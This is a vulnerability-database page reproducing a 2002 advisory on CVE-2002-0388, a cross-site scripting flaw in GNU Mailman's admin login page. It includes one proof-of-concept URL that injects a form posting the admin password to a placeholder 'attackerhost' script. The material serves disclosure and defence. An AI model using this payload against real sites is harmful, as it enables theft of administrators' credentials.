Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2002-0388

Publish Date: 20 May 2002

Author: office

                							

                source: http://www.securityfocus.com/bid/4825/info

GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code.

A user visiting the link will have the attacker's script code executed in their web browser in the context of the site running the vulnerable software. 

http://target/mailman_directory/admin/ml-name?adminpw="&gt;&lt;/form&gt;&lt;form/action="http://attackerhost/attackerscript.cgi"/method="post"&gt;&lt;br

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

GNU Mailman 2.0.x - Admin Login Cross-Site Scripting

Vulmon Search

About

Products

Connect